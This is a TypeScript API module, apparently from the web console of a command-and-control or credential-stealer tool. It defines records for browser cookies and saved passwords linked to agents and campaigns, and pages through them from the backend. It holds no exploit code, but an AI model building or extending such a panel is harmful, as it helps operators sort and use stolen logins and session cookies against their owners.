import { axios_instance } from "@/api/api";
import { toast } from "vue3-toastify";

export interface BrowserCredentialItem {
  id: string;
  agent_id: string;
  action_id?: string;
  created: number;
  modified: number;
  browser: string;
  cookie: string;
  domain: string;
  expired: number;
  campaign_id: string;
}

export interface BrowserCredentialPasswordItem {
  id: string;
  agent_id: string;
  action_id?: string;
  created: number;
  modified: number;
  browser: string;
  Pasword: string;
  url: string;
  user: string;
  campaign_id: string;
}

export const getBrowserCredentials = async (
  agent_id: string,
  action_id: string | undefined,
  page: number,
  size: number,
  keyword: string,
  type: "password" | "cookie" | "storage",
): Promise<{ data: any[]; total_filter: number }> => {
  try {
    const response = await axios_instance.post<{
      data: any[];
      total_filter: number;
    }>("/api/v1/view/browser-credential", {
      agent_id,
      action_id: action_id || undefined,
      page,
      size,
      keyword: keyword || "",
      type,
    });
    return response.data;
  } catch (err) {
    toast.error(err);
    return { data: [], total_filter: 0 };
  }
};
